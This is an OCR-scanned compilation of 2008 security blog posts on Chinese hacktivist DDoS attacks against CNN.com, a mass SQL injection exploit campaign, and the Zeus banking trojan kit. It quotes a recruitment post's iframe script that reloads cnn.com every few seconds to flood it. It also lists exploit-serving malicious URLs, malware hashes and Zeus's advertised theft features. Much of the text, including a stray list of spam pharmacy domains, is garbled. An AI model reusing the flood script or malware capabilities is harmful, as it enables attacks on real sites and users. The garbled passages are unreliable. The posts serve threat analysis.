9. Articles discussing which OS is the most secure one - the better configured one in 
terms of usability vs security, or the one where there’re no currently active bounties offered 
for vulnerabilities within 


10. Articles mentioning that China is hosting the most malware in the world - and while 
China is hosting it, the U.S is operating the most malware C &Cs in the world 
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http://www.viagra-generico.org 
http://www.acheterlevitra.biz 
http://www.acheterlevitra.net 
http://www.cialis-bestellen.info 
http://saludsexual.net 
http://www.edselected.rx-host.org 
http://www.edsexdrugs.com 
http://edsexpills.com 
http://edside.com 
http://edtabs.com 
http://www.edpillstreatment.com 
http://www.edpillstreatment.net 
http://www.effectiveedpills.com 
http://www.effectiveedpills.net 


http://effexoronline.net 


http://www.eforeignpharmacies.com 


http://egwrightpharmacy.com 
http://ehairgrowth.com 
http://www.ehealthpharmacy.com 
http://ehealthypharmacy.com 
http://eherbalbay.com 
http://ejsoharmacyplus.com 
http://ejtfamilymeds.com 
http://elavil.cc 
http://elavilamitriptyline.com 
http://elavilsideeffects.com 
http://elecards.com 
http://www.elerect.net 
http://www.eletedrugstore.com 
http://elitedrugstore.net 
http://www.elitenetpharmacy.com 
http://elite-pharmashop.com 
http://www.elixirdepot.com 
http://emailmedicine.com 


http://emaxpharmacy.com 
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4.4.19 Chinese Hacktivists Waging People’s Information Warfare Against CNN 
(2008-04-22 09:25) 


[HJ|A,|C,IK, ic) | 


Empowering and coordinating script kiddies by [1]releasing DIY DDoS tools (backdoored as 
well) during the [2]DDoS attacks against Estonia for instance, is exactly what is happening 
in the time of blogging with a massive forum and IM coordination between Chinese netizens 
enticed to install a pre-configured to flood CNN.com piece of malware. Both of these coor- 
dinated incidents greatly illustrate what [3]people’s information warfare, and the malicious 
culture of participation is all about. The PSYOPS anti-cnn.com initiative is maturing into a 
central coordination point for recruiting DDoS participants on a nationalism level. Some info 
on hackcnn.com , the malware, internal commentary on behalf of the hacktivists, and who’s 
behind it : 


hackcnn.com (58.49.59.253) 

58.48.0.0-58.55.255.255 CHINANET-HB CHINANET Hubei province network China Telecom A12 
Xin-Jie-Kou-Wai Street Beijing 100088, 

China, Beijing 100000 

tel: 101 1010000 

fax: 101 1010000 
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china@hackcnn.com 


Upon execution of the tool, 18 TCP Connection Attempts to cnn.com ( 64.236.91.24:80 ) 
start, trying to access the following file at CNN.com : 


- Request: GET = /aux/con/com1/../../[LAG]../. %./../../../../fakecnn/redflag-stay- 
here.php.aspx.asp.cfm.jsp 
Response: 400 "Bad Request" 


CJ SMITE RHE CJ UawPaseR CJ £naz ~) seyokep 


=o RPOSEMAL > RHA CO? BE. exe _ 
Mosquito killer. exe SERIAL. EXE id. | Fotos 
, ~ #54 
P , i m 
: tE 


antiCnn.exe 

Scanner results : 3 % Scanner(1/36) found malware! 
TROJAN.DOWNLOADER.GEN 

File size: 174592 bytes 

MD5...: cO3abd4d87 1cd83fe00df38536f26422 

SHA1..: 0502c74ee90e110ceed3cbb81b2ee53d26068691 
Released by : Red Flag Cyber Operations nixrumor@gmail.com 


From a network reconnaissance perspective, the Chinese hacktivists didn’t even bother 


to take care of Apache’s /server status, and therefore we’re easily able 
to obtain such juicy inside information about hackcnn.com such as : 
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cmetverk Tebsite Reon 


xs*@ Q8@ 280 tq 68 ® IAQ Bh w 


-€ ak Lone ares 
: * ~ 
| ¥) G) 2m) Z 
QD Piewdier DB Cormier C8t> Perens of Snagens Cp inferestions | incellaneonns - Outlines | [Besires 9° Teakes () Flew Sewees Optima xoe¢ 
_) Mitp: /fewe. bechoeam cond Ap Spertuneteerk Tebuite Been) 
Please Note 
The Sports Network website and other major news sites have been Racked by a pobncal entity fom China, and as a result are temporarily unaveladle. We apologize for any inconvenence and hope to be back up and running a 
> 


200n) at poswible. Thank you for your patence and understarsiing 


Sports Network Management 


Current Time: Tuesday, 22-Apr-2008 07:00:56 

Restart Time: Monday, 21-Apr-2008 15:25:39 

Parent Server Generation: 0 

Server uptime: 15 hours 35 minutes 17 seconds 

Total accesses: 291670 - Total Traffic: 533.8 MB 

5.2 requests/sec - 9.7 kB/second - 1918 B/request 

4 requests currently being processed, 246 idle workers 


Internal commentary excerpts regarding the motivation and their updates on the first 
DDoS round : 


" Our team of non-governmental organisations, We only private network enthusiasts. However, 
we have a patriotic heart, We will absolutely not permit any person to discredit our motherland 
under any name, We are committed to attack some spreading false information, and malicious 
slander, libel, support Tibet independence site. " 


@ oa a4 ie “th 33 http: //sports. si. enn. com/enn. txt 


<!DOCTYPE html PUBLIC "-//W3C//DID XHTML 1.0 Transitional//EN" "ht 
<html xmlns="http://www.w3.org/1999/xhtml"> 

<head> 

<html> 

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" 
</head> 

<body> 

lengmo null amxku lunhui xuxu fuck cnn 

fare! SRE zz ME TPRRE TRIAIAIES 

RRB, miori wtb -MAR 


{SAR cAvoDayR Rit. « QQHS1236668e 
<a href="http://www.avOday.com" target="_blank">AvODay</a> 


</body> 
</html> 


" User to a black CNN website suffer the same name. Yesterday, some Internet users attacked 
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the domain name contains a "cnn" sports Web site, leaving protest speech, but reporters did 
not check the site found a relationship with CNN. 


Yesterday’s attack was th 


e website with the domain name sports.si.cnn.com engaged in the work of the network of 
residents in Urumqi Mr. Chen, at about 2 pm, the attackers up a website hackcnn.com know, 
the "CNN sub-station" invasion and modify their pages. "Tug-of-war administrator and hackers," 
Mr. Chen said, after sports.si.cnn.com pages sometimes normal, and sometimes been modified. 
16:50, the reporter saw on the pages left in bilingual text and flash animation, stressed that 
Tibet is a part of China, cnn protest against prejudice and false reports, the title page column 
was changed to "F * * KCNN!. " 


A few minutes later, the web site to enter a user ID and password before connecting, "evidently 
administrator of the authority." Chen analysis. Yesterday, the reporter tried to contact the 
attack, but received no response. Reporter verify that the contact address sports.si.cnn.com 
Pennsylvania in the United States, and the sports channel CNN web site is not the same, did 
not disclose information with the CNN. " 


@Fuck CNN thttp;//hackenn.com - @38}(Maxth.. x6 SBM Se) S28G IBM sy) Se mlee de. 


I9@Os9- SQ http://sports.si.cnn.com/china.htm! @ 
x Fl Sasi. | seein. SQ ruck cnn..| — bttp://www...| <<iRaeiet «| <<iREREE *.. 


Poewteae, Bree, Withee pe 
4}! 

Tibet WAS,IS,and ALWAYS WILL BE a part of 
China! 


BEATSFA ST RAR GS, BATA RRR AA YS SR. 


We are not against the western media, but against the lies and fabricated stories in the media. 


s 


BAISFA RM PAAR, SRT M 


We are not against the western people, but against the prejudice from the western society.! 


HIAICIK, pee 


eS )L mo AAR 


BEE ate07A af 
7 203M 1710M $8.25.220.74 192.168,21.102 14:21:44 417 KB > S 1 @ Bo 2/ 


DDoS-ing is one thing, defacing is entirely another, try [4] 
sports.si.cnn.com/test.htm 
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which was last defaced yesterday spreading " We are not against the western media, but 
against the lies and fabricated stories in the media ", " We are not against the western people, 
but against the prejudice from the western society.! " messages. 


According to forum postings however, now that they’ve sent a signal, the attitude is 
shifting from attacking CNN to Western media in general. Thankfully, just like the case with 
[5]the Electronic Jihad program, they did not put a lot of efforts into ensuring the lifecycle of 
the tool will remain as long as possible, by introducing a way to automatically update the tool 
with new targets. In fact, in [6]the Electronic Jinad case, the hardcoded update locations were 
all down priot to releasing the tool, making a bit more efforts cunsuming to finally manage to 
[7]obtain the targets list. 


1. http: //ddanchev. blogspot .com/2007/10/empowering-script-kiddies.htm 

2. http: //ddanchev. blogspot .com/2007/08/your-point-of-view-requested.htm 

3. http://ddanchev. blogspot .com/2007/10/peoples-information-warfare-concept .htm 
4 


ttp://209.85.135.104/search?q=cache: bP4f1_vKGtwJ:sports.si.cnn.com/test .htm+/22fuck+cnn/22k&hl=enk&ct=clnk& 


ttp://ddanchev.blogspot.com/2007/11/electronic- jihad-v30-what-cyber- jihad. htm 


5. 
6. http: //ddanchev. blogspot .com/2007/08/cyber- jihadist-dos-tool.htm 
7. 


ttp://ddanchev. blogspot .com/2007/11/electronic- jihads-targets-list.htm 
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4.4.20 The DDoS Attack Against CNN.com (2008-04-23 02:21) 


Oe PAO BRACE Agi!!! DDOSH++ CNNp OOO betpe www. amyac.comédescnm hem 
Ay3AsleO* ea Ot Av MOO. Tf~ 0," AlsOsP OA TAR 


CNN.com —— =... 


- 


The DDoS attack against CNN.com, whether successful or not in terms of the perspective of 
complete knock-out, which didn’t happen, is a perfect and perhaps the most recent example 
of a full scale [1]people’s information warfare in action. Utilizing the bandwidth of the over 
200 million nationalism minded Chinese Internet users, can greatly outpace any botnet’s 
capacity if coordinated, or though the use of automated DIY tools, like the ones we’ve seen 
released for the purpose of attacking CNN.com 


[2]CNN.com was indeed inacessible for a period of three hours according to NetCraft, 
and literally any web site performance monitoring too with a historical perspective for a host 
can prove the same : 


"The CNN News website has twice been affected since an earlier distributed denial of 
service attack last Thursday. CNN fixed Thursday’s attack by limiting the number of users 
who could access the site from specific geographical areas. Subsequently, an attack was pur- 
portedly organised to start on Saturday 19th April, but cancelled. However, our performance 
monitoring graph shows CNN’s website s 


Uu 


ffered downtime within a 3 hour period on Sunday 
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morning, followed by other anomalous activity on Monday morning, where response times 
were greatly inflated. Netcraft is continuing to monitor the CNN News website. Live uptime 
graphs can be viewed here. " 


[3]Unrestricted warfare is all about bypassing the most fortified engagement points, and 
achieving asymmetric dominance by excelling where there are no engagement points, in 
order for the attacker to enjoy the pioneer advantage. Now that CNN.com was indeed 
slowed down to a situation where it was unnacessible, what remains to be answered is how 
was CNN.com DDoS? Throught a botnet, or through [4]the collective bandwidth of virtually 
recruited Chinese citizens? Despite that the common wisdom in terms of botnets used 
speaks for itself, this is China hacktivism and therefore common wisdom does not apply in an 
unrestricted warfare situation, and best of all data speaks for itself. 


fe Supper DDos (¥1.00) 


Powerful DDOS tools, only for testing usage 


Target IP: | (Input Target IP or DNS name} 
Port: (80 {Input Target Port] 


Protocol: “ TCP Cc ™ ICI (Choose the protocol] 


InformationJePress "Attack" button to start attack! 


- Through the use of DIY DDoS Tools 


Besides [5]anticnn.exe which | assessed in a previous post, there’s also the Supper DDoS 
tool that as it appears was also getting actively recommended for participating in the attack, 
courtsy of a Chinese script kiddies group. Some basic info : 


Scanners Result: 3 /32 (9.38 %) 

DDoS.Win32.Sdattack.A; DDoS. Trojan 

File size: 1510643 bytes 

MD5...: ed25e7188e5aal17f6b35496a267be557 

SHA1..: 71138f0c0556dde789854398c3c7cde29352662b 


For instance, Estonia’s DDoS attacks were a combination of botnets and DIY attack tools 
released in the wild, whereas the attacks on CNN.com were primarily the effect of people’s 
information warfare, a situation where people would on purposely infect themselves with 
malware released on behalf of Chinese hacktivists to automatically utilize their Internet 
bandwidth for the purpose of a coordinated attack against a particular site. 


1451 


CNN.com ———— =... 
| ve Reis GNTERTANAUSNT MEALTN TECH TRAVE . 


onoQgooMsSNOoooooo'0o00"'o000fL 


- Collectively building bandwidth capacity and mobilizing novice cyber warriors 


What if a simple script that is automatically refreshing CNN.com multiple times in sev- 
eral IFRAME windows, gets embedded at thousands of sites, and then promoted at hundreds 
of forums, with a single line stating that - "If you’re a patriot, forward this to all your friends"? 
Now, what if this gets coordinate to happen at a particular moment in time? This is perhaps 
the most realistic scenario to what exactly happened with CNN.com, and data speaks for itself, 
in fact | can easily state that the bandwidth generated by this massive PSYOPs campaign is 
greater than the one used by a botnet that’s also been DDoS-ing CNN.com. All of these sites 
are basically refreshing CNN.com every couple of seconds, thereby wasting the sites’s band- 
width, the only flaw of this attack approach compared to a botnet, is that all the participating 
hosts are Chinese, and therefore as NetCraft pointed out, CNN blocked access to certain 
countries, take these countries as China for instance. If it were a botnet used, the diversity of 
the infected hosts would have required more efforts into dealing with the attack, then again 
from another perspective regular web traffic compared to network flood is sometimes harder 
to detect as a DDOS attack. 
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hackerhf.com/cnn.html 
80aft.com/cnn.htm 
tom765.cn/cnn.html 
ah930.com/cnn.htm 
0851qiche.cn/cnn.html 


xdadmin.com/cnn.html 
ah930.com/cnn.html 


s234sdf3.cn.webz.datasir.com/cnn.asp 


bbscar.com.cn/cnn 
120abc.cn/cn 

n.html 

hospltal.cn/cnn.html 
bbs.cityzx.cn/cnn.htm 
bestmf.cn/cnn.html 
anlycloud.com/cnn/cnn 
qibubbs.net/ddoscnn.htm 
maje.cn/cnn.html 
edu.sina.googlepages.com/FuckCNN.htm 
urlonline.com.cn/kaocnn.html 


Impx.net/cnn.htm 


ily88.com/cn 
n.htm! 
Zjipc.net/cnn 


axlovechina.cn/ 
idernice.com/cnn.asp 


conncn.com/cnn.html 
xuanxuanmu.000webhost.com/cnn.html 
jianwl1.cn/cnn.htm 

bjzs114.com/cnn.htm 
0851qgiche.cn/cnn.htm! 


yaanren.net/cnn.html 


todayol.cn/cnn.html 
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17bnb.com/cn 

n.htm 
hackerhf.com/cnn.html 
hnjdbbs.com/cnn.html 
sql8.net/cnn 
bh125.cn/cnn.html 
razorcn.cn/cnn.html 
93HR.com/cnn.html 


tke08.com/cnn.htm 
vipeee.com/cnn.htm 


This is also the statement made for the recruiting purpose across the forums, including 
remarks against France’s policy against China : 


Anti-CNN Plans v4.19 


" Revenge of the flame - we, as the publicity in the network of special groups, we no- 
tice as follows: We are still able to recall that the Sino-US hackers exciting war, and that 
war, what are the reasons? That have taken place in Indonesia because of the large-scale 
anti-Chinese, the majority of Chinese women were raped, killed, and we Chinese hackers 
predecessors such unbearable humiliation, and from the other side of the ocean in advance 
of the attack, losing their right to. " cn "for China’s first website launched a large-scale attack, 
but at that time the Chinese network is not very developed, we use the most immature way 
to attack, but in any case, we all expressed their intention by everyone, although we on the 
network do not know each other, but we have a common motherland. 


We know that the 2008 Olympic Games will be held in our beloved motherland, which is the 
dream of the people look forward to for a long time, and we in the passing of the torch in 
the process of being repeatedly obstructed because we all know that, as an act of Tibetan 
independence elements each of us Mission hearts have a personal anger. Then we briefly look 
at the practice of France: France is now the largest in the protection of Tibetan independence, 
advocates in support of France is in support of splitting China, French President Sarkozy, the 
country is now the world just for a dare to openly resist Beijing Olympic Games President, the 
Chinese go-vern-ment has just come to an end with the French Airbus as much as billions of 
dollars in trade contracts. France on bad faith. 


Recently, the United States "cnn" Since, as we said a number of Chinese people can not 
accept things, is that we are willing to endure, willing to yield? We plan on taking the lead in 
the 2008.4.19 "cnn" Web site attacks, as a Chinese, please support us. 


Plot: 
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1, first of all, all the conditions for full, | expect four days later, in the - on April 19, 2008, 
8:00 p.m., at www.cnn.com against a DDOS attack! More than three hours on the CNN Web 
site with the assistance of attacks, How DOS attack CNN website? If you are patriotic, please 
forward! 


iframe Id="cnn" width="100 %" height="100"> 


script> 


Var e = document.getElementByld ( ’cnn’); 


Setinterval ("e.src = ‘http://www.cnn.com’", 3000); 


// 1000 said that 1,000 ms, you can modify and transmit 


You can also directly open qibubbs.net/ddoscnn.htm open on the trip, you do not affect 
anything. | have to, | have friends in all of it again, the strong support of friends, and their 
repercussions great, and to many people, have been transmitted in other friend, a classmate 
now has begun to link their Web sites the | believe that compatriots in China, in collaboration 
with CNN article seconds click rate in the second can at least 50 million times, if the 200 
million Internet users click on, | believe CNN, will be suspended instantaneous, as our fellow 
countrymen will be more hackers the chance to win big, exciting good mood now, and looks 
forward to 8:00 after we are all fellow hackers smoothly, we will sincerely pray that China 
win. The great motherland is not to take advantage of the separatist elements, all anti-China 
reunification of the sophistry of speech are all in vain Revenge of the flame - we, as the 
publicity in the network of special groups, we notice as follows: 


We are still able to recall that the Sino-US hackers exciting war, and that war, what are the 
reasons? That have taken place in Indonesia because of the large-scale anti-Chinese, the 
majority of Chinese women were raped, killed, and we Chinese hackers predecessors such 
unbearable humiliation, and from the other side of the ocean in advance of the attack, losing 
their right to. " cn "for China’s first website launched a large-scale attack, but at that time the 
Chinese network is not very developed, we use the most immature way to attack, but in any 
case, we all expressed their intention by everyone, although we on the network do not know 
each other, but we have a common motherland. 


We know that the 2008 Olympic Games will be held in our beloved motherland, which is the 
dream of the people look forward to for a long time, and we in the passing of the torch in 
the process of being repeatedly obstructed because we all know that, as an act of Tibetan 
independence elements each of us Mission hearts have a personal anger. 


Then we briefly look at the practice of France: France is now the largest in the protection of 
Tibetan independence, advocates in support of France is in support of splitting China, French 
President Sarkozy, the country is now the world just for a dare to openly resist Beijing Olympic 
Games President, the Chinese go-vern-ment has just come to an end with the French Airbus as 
much as billions of dollars in trade contracts. " 
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This particular DDoS people’s information warfare attack against CNN.com is also a great 
example of a psychological operations (PSYOPS) chain-letter. Given China’s 3.0 state of 
social networking, messages forwarding people to sites that would automatically refresh their 
browsers with CNN.com were distributed at over 5000 web forums, with a bit of propanga 
taste enticing everyone to forward the message by telling them "If you’re a patriot forward 
this attack link", so if you don’t, it means you’re not a patriot, another indication of China’s 
understanding of the effectiveness of psychological operations (PSYOPS) online. 


1. http: //ddanchev. blogspot .com/2007/10/peoples-information-warfare-concept.htm 


2. http: //news .netcraft.com/archives/2008/04/22/cnn_site_bears_the_brunt_of_chinese_attackers.htm 


3. http: //ddanchev. blogspot .com/2007/12/combating-unrestricted-warfare.htm 


Yet another massive SQL injection attack is making its rounds online, and this time without the 
[1]SEO poisoning as an attack tactic, has managed to successfully infect the United Nations 
events page, which is now also marked as malware infected page, and with a reason since 
both the malicious URI and the injection are still active. [2]According to WebSense : 


" This mass injection is remarkably similar to the attack we saw earlier this month. When a 
user browses to a compromised site, the injected JavaScript loads a file named 1.js which is ho 


sted on http://www.nihao[removed].com The JavaScript code then redirects the user to 1.htm 
(also hosted on the same server). Once loaded, the file attempts 8 different exploits (the 
attack last April utilised 12). The exploits target Microsoft applications, specifically browsers 
not patched against the VML exploit MSO7-004 as well as other applications. Ominously files 
named McAfee.htm and Yahoo.php are also called by 1.htm but are no longer active at the time 
of writing. There are further similarities too between the two mass attacks. Resident on the 
latest malici 


ous domain is a tool used in the execution of the attack. An analysis of that tool can be found 
in the ISC diary entry here. Mentioned in that diary entry is http://www.2117[removed].net. 
Our blog on that attack can be found here. It appears that same tool was used to orchestrate 
this attack too. " 


text/html 


ir age! aif 


text/htrl 
textshtrnl 
text/html 
text/html 
text/htrel 
text/html 


text/html 
text/html; c.. 


tr 


ntm 

345202594arvefe=http%3Asinihaorr1.com/t 
image/gif 
text/html 
text/html 


text/javasc. 


Let’s assess the malicious injection. nihaorrl.com/ 1.js (219.153.46.28) is attempting to 
load nihaorrl.com/ 1.htm , where several other internal exploit serving URLs and javascript 
obfuscations load through IFRAMES, such as : 


nihaorr1.com/ Real.gif 
niha 
orrl.com/ Yahoo.php 


nihaorrl.com/ cuteqq.htm 
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nihaorr1.com/ Ms07055.htm 
nihaorr1.com/ Ms07033.htm 
nihaorrl.com/ Ms07018.htm 
nihaorr1.com/ Ms07004.htm 
nihaorr1.com/ Ajax.htm 
nihaorrl 

.com/ Ms06014.htm 
nihaorr1.com/ Bfyy.htm 
nihaorr1.com/ Lz.htm 
nihaorrl.com/ Pps.htm 
nihaorr1.com/ XunLei.htm 


and finally serve the malware, by also taking us out of the point and loading another malicious 
IFRAME farm at gg.haoliuliang.net/one/ hao8.htm?036 (222.73.44.162) : 


Scanners Result: 18/ 


32 (56.25 %) : 
W32/PWStealer1!Generic; PWS:Win32/Lineage.WI.dr 


File size: 24667 bytes 
MD5...: 46913be127d648373e511974351ff04e 
SHA1..: 0ab703c93e3ad7c03dlaae5ea394d7db3b89bfd2 


Another internal IFRAME serving exploits is also loading at 


haoliuliang.net , gg.haoliuliang.net/wmwm/ new.htm where a new piece of malware is served 


Scanners Result: 26/32 (81.25 %) 

Trojan-PSW.Win32.OnLineGames.ppu; Trojan.PSW.Win32.OnlineGames.GEN 
File size: 7205 bytes 

MD5...: af05c777700b6338f428463e56f316a05 

SHA1..: bd68f621ec6c9796afa8b766c6cf4167afbd4703 


As it appears, everyone’s a victim of web application vulnerabilities discovered automat- 


ically, and either filtered based on high-page rank, or trying to take advantage of the long-tail 
of SQL injected sites to compensate for the lack of vulnerable high profile sites. 
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Related posts: 

[3]UNICEF Too IFRAME Injected and SEO Poisoned 
[4]Embedded Malware at Bloggies Awards Site 
[5]Embedding Malicious IFRAMEs Through Stolen FTP Accounts 
[6]Yet Another Massive Embedded Malware Attack 
[7]MDAC ActiveX Code Execution Exploit Still in the Wild 
[8]Malware Serving Exploits Embedded Sites as Usual 
[9]Massive RealPlayer Exploit Embedded Attack 
[10]Syrian Embassy in London Serving Malware 
[11]Bank of India Serving Malware 

[12]U.S Consulate St. Petersburg Serving Malware 
[13]The Dutch Embassy in Moscow Serving Malware 
[14]U.K’s FETA Serving Malware 

[15]Anti-Malware Vendor’s Site Serving Malware 
[16]The New Media Malware Gang - Part Three 
[17]The New Media Malware Gang - Part Two 

[18]The New Media Malware Gang 

[19]A Portfolio of Malware Embedded Magazines 
[20]Another Massive Embedded Malware Attack 

[21]l See Alive IFRAMEs Everywhere 

[22]| See Alive IFRAMEs Everywhere - Part Two 


ttp://ddanchev. blogspot .com/2008/03/massive-iframe-seo-poisoning-attack.htm 


. http: //securitylabs.websense.com/content/Alerts/3070. aspx 


ttp://ddanchev.blogspot.com/2008/04/unicef-too-iframe-injected-and-seo.htm 


OO Seo. Ot ew Ne 


10. http://ddanchev. blogspot .com/2007/09/syrian-embassy- in-london-serving. htm 
. http://ddanchev. blogspot .com/2007/08/bank- of- india-serving-malware .htm 
. http://ddanchev. blogspot .com/2007/09/us- consulate-st-petersburg-serving.htm 


. http://ddanchev. blogspot .com/2008/02/uks-feta-serving-malware .htm 


. http://ddanchev. blogspot .com/2008/02/anti-malware-vendors-site-serving. htm 


. http://ddanchev. blogspot .com/2008/02/new-media-malware-gang-part-three.htm 
17. http://ddanchev. blogspot .com/2007/12/new-media-malware-gang-part-two.htm 


PRPPPPrP PH 
Ou RWN PB 


ttp://ddanchev. blogspot .com/2007/11/i-see-alive-iframes-everywhere-part-two.htm 


. http://ddanchev. blogspot .com/2008/01/dutch-embassy- in-moscow-serving-malware.htm 
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4.4.22 Crimeware in the Middle - Zeus (2008-04-24 10:33) 


Virtual greed, or response rate optimization? The idea of converging phishing emails with 
embedded exploits and banking malware is nothing new, in fact phishers realizing that 
combining attack approaches can increase the chance of achieving their objective which in 
this case is either logging the authentication process or hijacking it, often forget that the 
phishing email could have succeeded without the embedded malware or exploit, which in 
many cases would have triggered an alarm. 


Yesterday, [1]Uriel Maimon posted an overview of the convergence of Rock Phish emails 
with Zeus, a crimeware kit used to deliver banking trojans : 


" The Trojan that was used in this attack belonged to the "Zeus" family of malware. Zeus is a 
nefarious type of Trojan for multiple reasons: 


1. The Zeus Trojan is a kit for sale: Anyone in the criminal community can purchase it for 
roughly $700. This means that the Rock group did not need to develop new skill-sets to write 
Trojan horses; they just purchased it on the open market. In the past 6 months RSA’s Anti-Fraud 
Command Center has detected more than 150 different uses of the Zeus kit, each one infecting 
on average roughly 4,000 different computers a day. 


2. Resistance to detection: The kit purchased is a binary generator. Each use creates a new 
binary file, and these files are radically different from each other - making them notoriously dif- 
ficult for anti-virus or security software to detect. To date very few variants have had effective 
anti-virus signatures against them and each use of the kit usually makes existing signatures 
ineffective. Just like in most cases, this particular use of the Zeus kit did not have any a 


nti-virus detection (with the popular engines we tested) at the time of this writing. 


3. Rich feature set: the Zeus Trojan has many startling capabilities. In addition to listening 
in on the submission of forms in the browser, the Trojan also has advanced capabilities, for 
instance the ability to take screenshots of a victim’s machine, or control it remotely, or add 
additional pages to a website and monitor it, or steal passwords that have been stored by pop- 
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ular programs (remember when you clicked on the "Remember this password?" checkbox?)... 
And the features-list goes on. 


As | look upon this blissful union of fraud and crime technologies, | can only envy the criminals 
who can find such coupling. Looking forward to my next birthday, | can only hope that | will 
have the opportunity to find such partnership in my own life (and maybe give my mother one 
less reason for disappointment). " 


We cannot talk about Zeus unless we compare it to another such crimeware kit serving 
banking trojans, in this [2]the Metaphisher kit. Metaphisher is particularly interested because 
of its much more customized GUI, it’s modular nature, allowing its sellers to lower or increase 
the price depending on which modules you'd like included, and which ones you’d like excluded, 
where a module means a preconfigured fakes, TANs, and phishing pages for all the banks ina 
country of choice. Moreover, despite that both, Zeus and Metaphisher are open source, and 
therefore malicious parties visionary enough to build communities around their kits in order 
to enjoy the innovation brought by multiple parties, Metaphisher has a bigger community 
next to Zeus, considered as the MPack in the web malware exploitations kits, namely a bit 
of an outdated commodity that is of course still capable of doing what does best - hijacking 
E-banking sessions and logging them to the level of impersonation. 


How are the authors of Zeus describing the kit themselves? Here’s a description : 


" ZeuS has the following main features and properties (full list is given here, in your 
part of assembling this list may not): 


Bot: 


- Written in VC + + 8.0, without the use of RTL, etc., on pure WinAPI, this is achieved at the 
expense of small size (10-25 Kb, depends on the assembly). 


- There has its own process, through this can not be detected in the process list. 


- Workaround most firewall (including the popular Outpost Firewall versions 3, 4, but 
suschetvuet temporary small problem with antishpionom). Not a guarantee unimpeded re- 
ception incoming connections. 


- Difficult to d 
etect finder / analysis, bot sets the victim and creates a file, the system files and arbitrary size. 


- Works in limited accounts Windows (work in the guest account is not currently supported). 
- Nevid ekvaristiki for antivirus, Bot body is encrypted. 


- Some way creates a suspected its presence, if you do not want it. Here is the view of the fact 
that many authors do love spyware: unloading firewall, antivirus, the ban on their renewal, 
blocking Ctrl + Alt + Del, etc. 


- Locking Windows Firewall (the feature is required only for the smooth reception incoming 
connections). 


- All your settings / logs / team keeps bot / Takes / sends encrypted on HTTP (S) protocol. (ie, in 
text form data will see only you, everything else bot <-> server will look like garbage). 


- Detecting NAT through verification of their IP through your preferred site. 
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- A separate configuration file that allows itself to protect against loss in cases of inaccessibility 
botneta main server. Plus additional (reserve) configuration files, to which the bot will ap 


ply, will not be available when the main configuration file. This system ensures the survival of 
your botneta in 90 % of cases. 


- Ability to work with any browsers / programs work through wininet.dll (Internet Explorer, AOL, 
Maxton, etc.): 


- Intercepting POST-data + interception hitting (including inserted data from the clipboard). 


- Transparent URL-redirection (at feyk sites, etc.) c task redirect the simplest terms (for example: 
only when GET or POST request, in the presence or absence of certain data in POST-request). 


- Transparent HTTP (S) substitution content (Web inzhekt, which allows a substitute for not only 
HTML pages, but also any other type of data). Substitution of sets with the help of guidance 
masks substitute. 


- Obtaining the required contents page, with the exception HTML-tags. Based on Web inzhekte. 
- Custo 
mizable TAN-grabber for any country. 


- Obtaining a list of questions and answers in the bank "Bank Of America" after successful 
authentication. 


- Removing POST-needed data on the right URL. 


- Ideal Virtual Keylogger solution: After a call to the requested URL, a screenshot happening in 
the area, where was clicking. 


- Receiving certificates from the repository "MY" (certificates marked "No exports" are not ex- 
ported correctly) and its clearance. Following is any imported certificate will be saved on the 
server. 


- Intercepting ID / password protocols POP3 and FTP in the independence of the port and its 
record in the log only with a successful authorise. 


- Changing the local DNS, removal / appendix records in the file % system32 % \ drivers \ etc \ 
hosts, ie comparison specified domain with the IP for WinSocket. 


- Keeps c 

ontents Protected Storage at first start the computer. 

- Removes S ookies from the cache when Internet Explorer first run on a computer. 
- Search on the logical disk files by mask or download a specific file. 


- Recorded just visited the page at first start the computer. Useful when installing through 
sployty, if you buy a download service from the suspect, you can see that even loaded in 
parallel. 


- Getting screenshot with the victim’s computer in real time, the computer must be located 
outside the NAT. 


- Admission commands from the server and sending reports back on the successful implementa- 
tion. (There are currently launching a local / remote file an immediate update the configuration 
file, the destruction OS). 
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- Socks4-server. 


- HTTP (S) PROXY-server. 
- Bot Upgrading to the latest version (URL new version set in the configuration file). " 


What’s most important to keep in mind in regarding to these crimeware kits, is that the sellers 
are shifting from product-centered to service-centered propositions, and while an year ago 
they would have been selling the kit only, today they’ve realized that it’s the output of the kit 
in terms of logged stolen accounting data that they’re selling. [3]Committing identity theft 
and abusing stolen E-banking accounting data is already a service, compared to the product 
it used to be. 


Related posts: 

[4]Targeted Spamming of Bankers Malware 
[5]Localized Bankers Malware Campaign 
[6]Client Application for Secure E-banking? 
[7]Defeating Virtual Keyboards 

[8]PayPal’s Security Key 

[9]Nuclear Grabber Kit 

[10]Apophis Kit 


1. http://rsa.com/blog/blog_entry.aspx?id=1274 


http: //ddanchev.blogspot.com/2007/11/metaphisher-malware-kit-spotted-in-wild.htm 


. http: //ddanchev.blogspot .com/2007/03/underground- economys-supply-of-goods .htm 
. http://ddanchev. blogspot .com/2007/11/targeted-spamming-of-bankers-malware.htm 


http: //ddanchev.blogspot .com/2008/03/localized-bankers-malware-campaign.htm 


http: //ddanchev.blogspot.com/2007/05/client-application-for-secure-e-banking. htm 


. http://ddanchev. blogspot .com/2007/05/defeating-virtual-keyboards .htm 
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8. http: //ddanchev. blogspot .com/2007/08/paypals-security-key.htm 
9. http: //ddanchev. blogspot .com/2006/11/nuclear-grabber-toolkit .htm 
10. http: //ddanchev. blogspot .com/2008/02/rbns-phishing-activities.htm 


4.4.23 A Botnet Master’s To-Do List (2008-04-26 19:36) 


localhost MySQL: (from getemd.php) 


SELECT cmd FROM bots WHERE vide Al 
SELECT cmd FROM bots WHERE yideAz 


s AP ‘ 
SELECT cmd FROM bots WHERE vide AS 


I. __ [GET /geternd phptuid=a1 s \ / 
- ™ 


mfected hi, \ / 
machine — \ / 
~ \ 


43 [GET /getemd.phpruid=a2 } 5 = 
‘i < "| send("cmd") & authorizaton 
to all bots! packet 


infected A2 Ps http://botnet.org/ : 


machine = hacker 


wer 
wi [GET 7oetemd.phpruid=As_| in 


infected & 
machine 


Directory climbing it all of its simplicity, and [1JOSINT quality, just like it’s happened before. 


The process of developing malware bots that would either succeed based on the diversi- 
fication of the spreading and infection vectors used, or end up as a backdoor-ed commodity 
for experienced botnet masters to sent to novice ones, is entirely up to the coder, or perhaps 
module copy and paster. Some are going as far as implementing quality assurance approaches 
to ensure their malware has the lowest possible detection rate, before spreading it, on the 
[2]Janti malware and [3]firewall level, while others are [4]benchmarking and setting strategic 
objectives to achieve before starting the process itself. 


However, there are also wannabe botnet masters whose lack of understanding of the 
different between project management and "to-do list organization", and of course, setting 
